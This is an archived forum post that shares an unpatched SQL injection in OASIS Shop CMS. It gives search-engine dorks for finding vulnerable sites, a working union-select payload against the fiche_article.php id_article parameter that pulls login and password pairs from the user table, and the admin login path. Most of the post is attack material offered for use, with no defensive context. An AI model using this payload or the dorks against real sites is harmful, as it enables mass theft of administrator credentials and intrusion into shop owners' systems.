PDA

View Full Version : OASIS Shop CMS bug (HOT)


petunia
08-07-2008, 01:54 AM
Author: rsauron
Email : rsauron@gmail.com

App Name: OASIS Shop CMS

Dork: inurl:"fiche_article.php?id_article="
Dork: "Web et Solutions avec OASIS 2007"

POC: +and+1=2+union+select+concat(login,0x3a,password), 2,3+from+user+limit+1,1/*

Admin Login Path: www.site.com/admin/ (http://www.site.com/admin/)

Vuln Discovered 07/31/2008
---------------------------------
Not yet publicated (06-08-08)